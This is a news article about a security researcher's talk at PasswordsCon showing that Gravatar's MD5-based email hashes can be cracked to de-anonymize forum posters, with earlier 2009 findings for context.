LAS VEGAS—If you have an account on Github, StackExchange, or any one of countless other sites, there's a good chance hackers can identify the e-mail address you used to register it. That's because Gravatar, a behind-the-scenes service that says it works with millions of sites, broadcasts the information using cryptography that in many cases is trivial to crack.
People have been warning about the privacy risk posed by Gravatar, short for Globally recognized avatar, since at least 2009. That's when a blogger showed he was able to crack the cryptographic hashes that the service uses to uniquely identify its users. Gravatar, it turned out, derived the hashes with the user's e-mail address, and the blogger was able to translate about 10 percent of the more than 80,000 user IDs he harvested. Now, a researcher has upped the ante by using a more advanced cracking technique to de-anonymize participants advocating racial hatred and other extreme topics in online forums hosted in France.
Speaking at the PasswordsCon conference in Las Vegas Wednesday, security researcher Dominique Bongard said he identified 45 percent of the e-mail addresses used to post comments he found in France's most well-known political forum, which he declined to mention by name. His job was made easier by Gravatar's use of the MD5 hash function, which is designed to generate hashes quickly and with a minimum of computing resources. Had Gravatar used bcrypt or another "slow" algorithm, his task would have taken considerably longer. In a country such as France, where there can be severe legal penalties for voicing extreme opinions, extracting the e-mail addresses isn't without its consequences.